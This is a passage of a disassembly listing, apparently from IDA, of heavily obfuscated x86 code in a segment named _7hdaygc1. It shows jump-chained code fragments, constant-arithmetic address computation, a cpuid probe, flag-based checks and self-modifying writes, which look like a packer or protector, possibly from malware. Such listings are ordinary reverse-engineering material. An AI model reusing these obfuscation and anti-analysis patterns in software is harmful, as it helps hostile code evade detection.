; FUNCTION CHUNK AT 0042EADC SIZE 00000026 BYTES
xchg edi, [esp+0]
pop edi
jnz loc_42C78F
mov eax, [ebp-4]
cmp byte ptr [eax], 0E8h
jnz loc_42EAE2
mov eax, [ebp-4]
loc_424B7C: ; CODE XREF: _7hdaygc1:00426BAB�j
inc eax
jmp loc_4266AF
sub_424B63 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_424B82: ; CODE XREF: sub_425E64+2C5E�j
jz loc_42D35C
jmp loc_42F903
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
or esi, 3D4E26C8h
jmp sub_4270E6
; ---------------------------------------------------------------------------
loc_424B98: ; CODE XREF: _7hdaygc1:loc_42E550�j
not ebp
jmp loc_425C6B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F789
loc_424B9F: ; CODE XREF: sub_42F789-A71C�j
shl eax, 0Ah
mov edx, [ebp-4]
add [edx], eax
mov eax, [ebp-4]
mov eax, [eax]
js loc_424A97
jmp loc_42910B
; END OF FUNCTION CHUNK FOR sub_42F789
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268BD
loc_424BB7: ; CODE XREF: sub_4268BD:loc_42C879�j
and edi, 0C98F58CFh
or edi, 67636D2Dh
loc_424BC3: ; CODE XREF: sub_428B5B:loc_4244AA�j
rol edi, 8
add edi, 14C4AB3Ch
xchg edi, [esp+0]
jmp loc_4247A6
; END OF FUNCTION CHUNK FOR sub_4268BD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_90. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_424BD5: ; CODE XREF: sub_4253A0:loc_42DD4A�j
; sub_4253A0+8BBB�j
mov eax, [ebp-8]
call sub_424BE6
; END OF FUNCTION CHUNK FOR sub_4253A0
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_424BDD: ; CODE XREF: sub_425C2C:loc_423F33�j
; sub_42A6C3-4301�j ...
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4269CB
loc_424BE1: ; CODE XREF: sub_4269CB-17A7�j
jmp loc_42CF89
; END OF FUNCTION CHUNK FOR sub_4269CB
; =============== S U B R O U T I N E =======================================
sub_424BE6 proc near ; CODE XREF: sub_4253A0-7C8�p
; _7hdaygc1:004257C8�j ...
; FUNCTION CHUNK AT 00423B03 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042E05C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042E27E SIZE 00000005 BYTES
push eax
push ebx
jmp loc_42E27E
sub_424BE6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_424BED: ; CODE XREF: sub_42AFFE-67B9�j
; _7hdaygc1:0042485A�j
or eax, 0E34B6169h
rol eax, 3
test eax, 8
jmp loc_42ADEA
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_424C01: ; CODE XREF: sub_423172+7958�j
call sub_42A94C
push 786E376Fh
pop edx
or edx, 0C5B0EDBEh
add edx, 62352139h
add edx, ebp
add edx, 9FCBDEC4h
mov edx, [edx]
jmp loc_429FD5
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428079
loc_424C27: ; CODE XREF: sub_428079:loc_42BB05�j
push eax
lea eax, sub_42936E
push eax
push 0
jmp loc_42F3E2
; END OF FUNCTION CHUNK FOR sub_428079
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42742E
loc_424C36: ; CODE XREF: sub_42742E-1AB�j
adc ecx, 0BC7238D7h
loc_424C3C: ; CODE XREF: sub_42742E:loc_42E6D0�j
call sub_42D757
mov edx, 71D66982h
push esi
push 0DD4EF091h
mov esi, ecx
jmp loc_42F25C
; END OF FUNCTION CHUNK FOR sub_42742E
; ---------------------------------------------------------------------------
loc_424C53: ; CODE XREF: _7hdaygc1:0042C28D�j
jge loc_429222
push ebx
; START OF FUNCTION CHUNK FOR sub_42CDF7
loc_424C5A: ; CODE XREF: sub_42CDF7:loc_424410�j
xor ebx, 0A71DDA2h
add ebx, ebp
add ebx, 1CEB399h
mov al, [ebx]
push offset loc_42C54D
jmp nullsub_102
; END OF FUNCTION CHUNK FOR sub_42CDF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232C2
loc_424C74: ; CODE XREF: sub_4232C2+13�j
mov eax, 80000000h
cpuid
cmp eax, 80000000h
jbe loc_42E845
jmp loc_428637
; END OF FUNCTION CHUNK FOR sub_4232C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_424C8B: ; CODE XREF: sub_423172:loc_429BCF�j
mov ebp, [esi]
loc_424C8D: ; CODE XREF: sub_423172:loc_4283F4�j
call sub_42D757
push 53CF1416h
pop edx
jmp loc_429093
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
loc_424C9D: ; CODE XREF: _7hdaygc1:loc_42E279�j
rol ecx, 2
or ecx, 641A42Bh
cmp ecx, 0D109AFB0h
jmp loc_42C22E
; ---------------------------------------------------------------------------
loc_424CB1: ; CODE XREF: _7hdaygc1:004260EA�j
jp loc_428CAF
xor ebp, 663D636Dh
jbe nullsub_110
jmp loc_427257
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD11
loc_424CC8: ; CODE XREF: sub_42FD11-C72C�j
pop esi
xor esi, 91CC8D53h
cmp esi, 30A8106Dh
jmp loc_42AD59
; END OF FUNCTION CHUNK FOR sub_42FD11
; ---------------------------------------------------------------------------
loc_424CDA: ; CODE XREF: _7hdaygc1:0042CCD8�j
or ebx, 0FA23EE9Ch
; =============== S U B R O U T I N E =======================================
sub_424CE0 proc near ; CODE XREF: sub_4291EA+4513�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423B88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004246EF SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00425048 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042688C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426F9F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429F63 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042A72F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042AE4A SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042AE79 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E1DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EDD7 SIZE 0000001B BYTES
xchg esi, [esp+0]
pop esi
ror eax, 12h
jmp loc_42E1DD
sub_424CE0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423410
loc_424CEC: ; CODE XREF: sub_423410+35DF�j
jz loc_42634C
jmp loc_427F54
; END OF FUNCTION CHUNK FOR sub_423410
; ---------------------------------------------------------------------------
loc_424CF7: ; CODE XREF: _7hdaygc1:00427F44�j
popf
jmp loc_42EDD7
; ---------------------------------------------------------------------------
xchg ebp, [edx]
jmp sub_429FC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_424D04: ; CODE XREF: sub_42AA47:loc_42EB48�j
jge loc_42346F
loc_424D0A: ; CODE XREF: sub_42ED70+7�j
jmp sub_42D757
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E4D7
loc_424D0F: ; CODE XREF: sub_42E4D7+A�j
jmp loc_429283
; END OF FUNCTION CHUNK FOR sub_42E4D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B4DE
loc_424D14: ; CODE XREF: sub_42B4DE+16�j
jmp loc_42E656
; END OF FUNCTION CHUNK FOR sub_42B4DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B20
loc_424D19: ; CODE XREF: sub_423B20+53E1�j
jmp loc_42CBD1
; END OF FUNCTION CHUNK FOR sub_423B20
; ---------------------------------------------------------------------------
jnb loc_429222
xor edx, edi
xchg esi, [ecx]
jmp loc_42964E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426E2E
loc_424D2D: ; CODE XREF: sub_426E2E+1EFD�j
mov ecx, [ebp-30h]
call sub_42A94C
; END OF FUNCTION CHUNK FOR sub_426E2E
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_424D35: ; CODE XREF: sub_42F65A-56D�j
mov eax, [ebp-34h]
shl eax, 3
lea eax, [eax+eax*4]
push ebx
push 0EA6DC87Dh
jmp loc_42F83B
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
adc ebp, 0E6849564h
jmp sub_42D0FB
; ---------------------------------------------------------------------------
jg loc_425148
jmp sub_425D85
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_424D5F: ; CODE XREF: sub_425C3B:loc_426211�j
; _7hdaygc1:00426A33�j
sbb ebp, 1A27D98Fh
; END OF FUNCTION CHUNK FOR sub_425C3B
; =============== S U B R O U T I N E =======================================
sub_424D65 proc near ; CODE XREF: sub_42C443:loc_42C394�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00428068 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
xchg ecx, [esp-4+arg_0]
jmp loc_428068
sub_424D65 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF91
loc_424D71: ; CODE XREF: sub_42EF91-1A33�j
jno loc_423A78
mov [edx], ebp
loc_424D79: ; CODE XREF: sub_42EF91:loc_42CE5A�j
push 2010h
push 0
call sub_428C3B
jmp loc_4251C9
; END OF FUNCTION CHUNK FOR sub_42EF91
; ---------------------------------------------------------------------------
and ebx, 0C4810AE8h
jmp loc_42F8D9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_210. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CC76
loc_424D96: ; CODE XREF: sub_42CC76+D�j
jmp loc_429BD8
; END OF FUNCTION CHUNK FOR sub_42CC76
; ---------------------------------------------------------------------------
locret_424D9B: ; CODE XREF: _7hdaygc1:loc_42F446�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4240B0
loc_424D9C: ; CODE XREF: sub_4240B0+B358�j
jmp loc_425EB7
; END OF FUNCTION CHUNK FOR sub_4240B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429098
loc_424DA1: ; CODE XREF: sub_429098+1A�j
jmp loc_42532F
; END OF FUNCTION CHUNK FOR sub_429098
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_145. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_424DA7 proc near ; DATA XREF: sub_426EBD:loc_4247AB�o
push eax
retn
sub_424DA7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_424DA9: ; CODE XREF: _7hdaygc1:0042B38F�j
jmp loc_428CB6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B034
loc_424DAE: ; CODE XREF: sub_42B034+1E�j
jmp loc_423785
; END OF FUNCTION CHUNK FOR sub_42B034
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_424DB3: ; CODE XREF: sub_425A37+439A�j
jmp loc_4264D0
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
loc_424DB8: ; CODE XREF: _7hdaygc1:loc_42BE5D�j
push edx
xor edx, 0D0D3FA84h
jmp loc_42B5E7
; ---------------------------------------------------------------------------
xor esi, 7631187Dh
mov eax, [edx]
jmp sub_428948
; ---------------------------------------------------------------------------
loc_424DD1: ; DATA XREF: sub_4246D7+1F58�o
mov edx, [ebp+8]
jmp loc_42A527
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4246D7
loc_424DD9: ; CODE XREF: sub_4246D7:loc_42CE42�j
push offset loc_423364
jmp loc_4253EA
; END OF FUNCTION CHUNK FOR sub_4246D7
; ---------------------------------------------------------------------------
loc_424DE3: ; DATA XREF: sub_42A833:loc_4244F2�o
rol eax, 3
push eax
call sub_42B650
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_83. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_424DEE: ; CODE XREF: _7hdaygc1:0042BAB6�j
jmp locret_42DD21
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424DF3 proc near ; CODE XREF: sub_42E283:loc_425883�p
; sub_4282A9+32B7�p ...
; FUNCTION CHUNK AT 00423AD5 SIZE 00000011 BYTES
push ebp
mov ebp, esp
jmp loc_423AD5
sub_424DF3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_424DFB: ; CODE XREF: sub_4253A0:loc_427222�j
; sub_42BEDA+1578�j
call sub_42FD2A
test eax, eax
jnz loc_4268F1
jmp loc_42DD4A
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
loc_424E0D: ; CODE XREF: _7hdaygc1:00423BB0�j
and eax, ecx
adc eax, edx
ror ecx, 1Eh
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_424E14: ; CODE XREF: sub_423DFC:loc_423B9F�j
xor eax, 0E81E1CC6h
jmp loc_426361
; END OF FUNCTION CHUNK FOR sub_423DFC
; =============== S U B R O U T I N E =======================================
sub_424E1F proc near ; DATA XREF: sub_42A4F1:loc_42638E�o
call sub_42D757
mov edx, 19CFC62Bh
call sub_42C1AF
call sub_42C712
sub_424E1F endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_424E33: ; CODE XREF: sub_4291EA+30F6�j
jmp nullsub_143
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F05E
loc_424E38: ; CODE XREF: sub_42F05E-7C35�j
jmp loc_42914E
; END OF FUNCTION CHUNK FOR sub_42F05E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_424E3D: ; CODE XREF: sub_425A37+5E�j
jmp loc_42E71C
; END OF FUNCTION CHUNK FOR sub_425A37
; =============== S U B R O U T I N E =======================================
sub_424E42 proc near ; DATA XREF: sub_426130:loc_42D37F�o
; FUNCTION CHUNK AT 004244FC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00427DBB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ABC4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C859 SIZE 00000011 BYTES
mov edi, [edi]
loc_424E44: ; CODE XREF: _7hdaygc1:loc_42F318�j
add eax, edi
pop edi
push edi
jmp loc_427DBB
sub_424E42 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_424E4D: ; CODE XREF: sub_423172+2E4E�j
; sub_423172+30CE�j ...
push 0E3A6294Ch
pop eax
xor eax, 0A475A037h
add eax, 4FCD2D66h
and eax, 0FC0C5B1Ch
xor eax, 0A568FEE8h
add eax, 0DA5E6793h
add eax, ebp
jmp loc_42F083
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
loc_424E78: ; CODE XREF: _7hdaygc1:0042DF8B�j
jnp loc_42913C
; =============== S U B R O U T I N E =======================================
sub_424E7E proc near ; CODE XREF: sub_4291CE+4950�p
; FUNCTION CHUNK AT 004248DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042856C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004295B9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042BF91 SIZE 0000001C BYTES
xchg edx, [esp+0]
pop edx
mov [ebx], edx
pop ebx
jmp loc_4248DF
sub_424E7E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_424E8A: ; CODE XREF: _7hdaygc1:00423E98�j
sub ebx, esi
jmp loc_4256F2
; ---------------------------------------------------------------------------
locret_424E91: ; CODE XREF: _7hdaygc1:loc_42DD22�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F789
loc_424E92: ; CODE XREF: sub_42F789-6673�j
jmp loc_424A85
; END OF FUNCTION CHUNK FOR sub_42F789
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4246D7
loc_424E97: ; CODE XREF: sub_4246D7+1F5D�j
jmp nullsub_135
; END OF FUNCTION CHUNK FOR sub_4246D7
; =============== S U B R O U T I N E =======================================
sub_424E9C proc near ; DATA XREF: _7hdaygc1:00429644�o
; FUNCTION CHUNK AT 0042A745 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042BA5A SIZE 00000005 BYTES
pop ebp
cmp dword ptr [ebp-38h], 0
jle loc_426C06
jmp loc_42BA5A
sub_424E9C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB83
loc_424EAC: ; CODE XREF: sub_42BB83+1315�j
xchg esi, [ebx]
mov ebx, esi
push eax
loc_424EB1: ; CODE XREF: sub_42BB83:loc_423FB3�j
push esi
push 4FCFFCE1h
xchg ebp, [esp+0]
mov esi, ebp
pop ebp
jmp loc_42431E
; END OF FUNCTION CHUNK FOR sub_42BB83
; ---------------------------------------------------------------------------
jl loc_42DA02
xor ebx, 0C678E3A3h
jmp sub_425B78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4F1
loc_424ED3: ; CODE XREF: sub_42A4F1-5306�j
test ecx, edx
jmp loc_426386
; END OF FUNCTION CHUNK FOR sub_42A4F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_424EDA: ; CODE XREF: sub_42C443:loc_42358F�j
jnz loc_42619E
jmp loc_42EF15
; ---------------------------------------------------------------------------
loc_424EE5: ; CODE XREF: sub_42C443:loc_42F411�j
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
jz loc_4239BA
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F7h
jnz loc_42619E
jmp loc_429BF7
; END OF FUNCTION CHUNK FOR sub_42C443
; =============== S U B R O U T I N E =======================================
sub_424F0A proc near ; CODE XREF: sub_428E56+4F83�p
; _7hdaygc1:0042FC18�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042B186 SIZE 0000000E BYTES
xchg ecx, [esp+0]
pop ecx
xchg esi, [esp-4+arg_0]
push 4AD9576Ch
pop edx
rol edx, 1Ah
jmp loc_42B186
sub_424F0A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov esi, eax
shl ecx, 1Ah
jmp sub_426B62
; ---------------------------------------------------------------------------
loc_424F29: ; CODE XREF: _7hdaygc1:00429A05�j
jge loc_42DFB2
; =============== S U B R O U T I N E =======================================
sub_424F2F proc near ; CODE XREF: _7hdaygc1:00427F6D�p
xchg esi, [esp+0]
pop esi
push 17BFBE58h
pop ecx
jmp loc_42901B
sub_424F2F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_424F3E proc near ; CODE XREF: _7hdaygc1:0042338E�p
; _7hdaygc1:0042B2E1�j
arg_4 = dword ptr 8
xchg ebx, [esp+0]
pop ebx
push eax
loc_424F43: ; CODE XREF: sub_42B74A:loc_423398�j
pop ecx
pop eax
xchg esi, [esp-8+arg_4]
mov ebp, esi
pop esi
jmp sub_42D859
sub_424F3E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C50D
loc_424F50: ; CODE XREF: sub_42C50D+2266�j
pop ebx
xchg ebx, [esp+4+var_4]
mov esp, ebp
pop ebp
mov eax, ds:dword_42E188
jmp loc_42BC28
; END OF FUNCTION CHUNK FOR sub_42C50D
; =============== S U B R O U T I N E =======================================
sub_424F62 proc near ; DATA XREF: sub_42F3C8:loc_42EA29�o
; FUNCTION CHUNK AT 00425A08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042618B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426769 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426F8F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00426FC2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042876F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00429F2F SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0042A35D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A6F3 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042AC5B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042AEC3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AEF5 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0042C4D9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042C60D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CF2A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042D79D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E7E6 SIZE 0000000F BYTES
popf
pushf
pop eax
xor eax, ecx
jnz loc_42AEF5
jmp loc_425A08
sub_424F62 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_424F72: ; CODE XREF: sub_425E64:loc_42933A�j
jnz loc_42947F
push edx
jmp loc_429471
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
xor edx, 0DA976C40h
jmp sub_423DAE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_424F89: ; CODE XREF: sub_426130:loc_425725�j
call sub_427CC6
loc_424F8E: ; CODE XREF: sub_42FCD3-A52F�j
jz loc_425083
jmp loc_42BF56
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_424F99: ; CODE XREF: sub_425E64+9CE6�j
xor edx, 62450251h
jmp loc_42F18C
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EE8A
loc_424FA4: ; CODE XREF: sub_42EE8A-3D20�j
cmp eax, 0B8990B90h
loc_424FAA: ; CODE XREF: _7hdaygc1:loc_42DBA8�j
jmp loc_426FCD
; END OF FUNCTION CHUNK FOR sub_42EE8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB83
loc_424FAF: ; CODE XREF: sub_42BB83:loc_42BE07�j
call sub_42D85F
jmp loc_42417B
; END OF FUNCTION CHUNK FOR sub_42BB83
; ---------------------------------------------------------------------------
push 0
call sub_42D85F
jmp loc_427FA0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429D1B
loc_424FC5: ; CODE XREF: sub_429D1B:loc_42C16A�j
push offset sub_423CCC
jmp loc_424804
; END OF FUNCTION CHUNK FOR sub_429D1B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_69. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42450E
loc_424FD0: ; CODE XREF: sub_42F8C4-542B�j
; sub_42450E+8DA0�j ...
mov eax, [ebp-4]
mov [ebp-0Ch], eax
jmp loc_42D2DD
; END OF FUNCTION CHUNK FOR sub_42450E
; ---------------------------------------------------------------------------
loc_424FDB: ; DATA XREF: sub_42DD73:loc_426588�o
call sub_42EB3E
loc_424FE0: ; CODE XREF: _7hdaygc1:004231D8�j
jmp locret_42E2E1
; =============== S U B R O U T I N E =======================================
sub_424FE5 proc near ; CODE XREF: sub_423E31+8�p
; _7hdaygc1:00429597�j
; FUNCTION CHUNK AT 004238C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425F30 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
add eax, 8DEBB3F1h
mov eax, [eax]
jmp loc_4238C0
sub_424FE5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423410
loc_424FF6: ; CODE XREF: _7hdaygc1:004239B5�j
; sub_423410:loc_42472D�j
or edi, 7D05F3E0h
test edi, 800000h
jmp loc_42A3F2
; END OF FUNCTION CHUNK FOR sub_423410
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_202. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_425008 proc near ; DATA XREF: sub_42EFF5+2�o
; FUNCTION CHUNK AT 004258E6 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042689C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00429B89 SIZE 00000005 BYTES
push 746825E9h
sub ecx, 1471D1EDh
jmp loc_4258E6
sub_425008 endp
; ---------------------------------------------------------------------------
loc_425018: ; DATA XREF: sub_42C369:loc_426357�o
add [ebp-4], eax
mov eax, [ebp-4]
shl eax, 9
add [ebp-4], eax
mov eax, [ebp-4]
jns loc_42C100
jmp loc_428485
; ---------------------------------------------------------------------------
loc_425032: ; CODE XREF: _7hdaygc1:004286EF�j
mov ebp, esp
add esp, 0FFFFFFCCh
lea eax, nullsub_2
mov byte ptr [eax], 0C3h
mov [ebp-4], eax
jmp loc_42425B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424CE0
loc_425048: ; CODE XREF: sub_424CE0-5CF�j
add eax, ebp
add eax, 9BA5916Fh
push offset sub_42DDF5
jmp loc_42AE79
; END OF FUNCTION CHUNK FOR sub_424CE0
; ---------------------------------------------------------------------------
locret_42505A: ; CODE XREF: _7hdaygc1:loc_42CA90�j
retn
; ---------------------------------------------------------------------------
loc_42505B: ; CODE XREF: _7hdaygc1:004287FB�j
jmp loc_42C655
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F789
loc_425060: ; CODE XREF: sub_42F789:loc_42358A�j
movzx eax, byte ptr [eax]
mov edx, [ebp-4]
add [edx], eax
mov eax, [ebp-4]
mov eax, [eax]
jmp loc_424B9F
; END OF FUNCTION CHUNK FOR sub_42F789
; ---------------------------------------------------------------------------
loc_425072: ; DATA XREF: sub_423A6D-40F�o
xchg edx, [esp]
mov eax, edx
pop edx
push ecx
mov ecx, eax
xchg ecx, [esp]
jmp loc_42A248
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_425083: ; CODE XREF: sub_426130:loc_424F8E�j
; sub_426130+94�j
mov eax, [ebp-2Ch]
cmp eax, [ebp-18h]
jz loc_42F171
loc_42508F: ; CODE XREF: _7hdaygc1:004249EB�j
jmp loc_42F147
; END OF FUNCTION CHUNK FOR sub_426130
; =============== S U B R O U T I N E =======================================
sub_425094 proc near ; DATA XREF: sub_42DAF7-4A01�o
xchg esi, [esp+0]
jmp sub_426CBB
sub_425094 endp
; ---------------------------------------------------------------------------
push edx
push 4FC5C157h
pop edx
rol edx, 0Ch
xor edx, 0BD41B30Bh
add edx, ebp
jmp loc_425DC1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_4250B3: ; CODE XREF: sub_42AA47:loc_42F5AC�j
call sub_4268D9
loc_4250B8: ; CODE XREF: sub_42450E+3FB5�j
push 327A2B62h
ror ecx, 8
loc_4250C0: ; CODE XREF: sub_42450E:loc_426104�j
mov eax, [ebp-4]
xor edx, edx
jmp loc_42E77E
; END OF FUNCTION CHUNK FOR sub_42AA47
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_59. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A2B
loc_4250CB: ; CODE XREF: sub_424A2B-723�j
jmp loc_42BB48
; END OF FUNCTION CHUNK FOR sub_424A2B
; ---------------------------------------------------------------------------
locret_4250D0: ; CODE XREF: _7hdaygc1:00429649�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426471
loc_4250D1: ; CODE XREF: sub_426471:loc_428F0C�j
push offset sub_4255F3
loc_4250D6: ; CODE XREF: _7hdaygc1:loc_42A13A�j
jmp loc_42998F
; END OF FUNCTION CHUNK FOR sub_426471
; ---------------------------------------------------------------------------
loc_4250DB: ; CODE XREF: _7hdaygc1:loc_423CA0�j
or eax, ds:4000F7h
and eax, 0FE2F564Dh
add eax, 6A61A88Ah
xor eax, 506D4C05h
add eax, 8F6109D2h
mov eax, [eax]
or eax, eax
jmp loc_42CFF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423812
loc_425102: ; CODE XREF: sub_423812+16�j
sub esi, 0FE36AA32h
cmp esi, 0C2F4598Ah
jmp loc_4235F8
; END OF FUNCTION CHUNK FOR sub_423812
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F642
loc_425113: ; CODE XREF: sub_42F642-91D6�j
jge loc_42436E
; END OF FUNCTION CHUNK FOR sub_42F642
; START OF FUNCTION CHUNK FOR sub_423A6D
loc_425119: ; CODE XREF: sub_423A6D-40A�j
jmp nullsub_29
; END OF FUNCTION CHUNK FOR sub_423A6D
; ---------------------------------------------------------------------------
not edi
mov ebp, 43FBBAB6h
